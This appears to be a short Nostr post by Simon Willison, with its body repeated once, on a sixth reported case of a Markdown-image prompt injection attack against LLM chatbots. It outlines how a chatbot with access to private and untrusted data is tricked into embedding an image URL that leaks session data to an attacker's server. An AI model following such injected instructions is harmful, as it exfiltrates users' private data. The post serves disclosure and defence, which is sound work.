Simon Willison on Nostr: The 6th example I've seen of the same prompt injection attack against LLM chatbots: ...
The 6th example I've seen of the same prompt injection attack against LLM chatbots: https://embracethered.com/blog/posts/2024/github-copilot-chat-prompt-injection-data-exfiltration/
The attack involves tricking an LLM chatbot with access to both private and untrusted data to embed a Markdown image with a URL to an attacker's server where that URL leaks private data extracted from the session.
We've now seen this same attack in ChatGPT itself, Google Bard, Writer.com, Amazon Q and Google NotebookLM (all now fixed, thankfully).
My collection: https://simonwillison.net/tags/markdownexfiltration/
The attack involves tricking an LLM chatbot with access to both private and untrusted data to embed a Markdown image with a URL to an attacker's server where that URL leaks private data extracted from the session.
We've now seen this same attack in ChatGPT itself, Google Bard, Writer.com, Amazon Q and Google NotebookLM (all now fixed, thankfully).
My collection: https://simonwillison.net/tags/markdownexfiltration/